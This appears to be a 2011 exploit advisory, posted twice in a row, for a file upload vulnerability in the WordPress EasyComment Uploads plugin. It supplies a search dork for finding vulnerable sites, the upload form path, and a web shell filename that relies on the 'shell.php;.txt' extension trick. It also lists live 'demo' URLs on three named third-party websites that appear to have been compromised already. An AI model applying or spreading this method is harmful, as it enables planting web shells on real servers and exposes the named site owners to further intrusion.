Exploit WordPress “/easy-comment-uploads/upload-form.php”
—————————————————————————-
| Title : WordPress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
| Date : 15/06/2011
| Dork : “/easy-comment-uploads/upload-form.php”
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
—————————————————————————-
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[png],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/shell.php;.txt
=========================================================
Demo langsung :
http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
|
—————————————————————————-
| Title : WordPress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
| Date : 15/06/2011
| Dork : “/easy-comment-uploads/upload-form.php”
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
—————————————————————————-
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[png],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/shell.php;.txt
=========================================================
Demo langsung :
http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
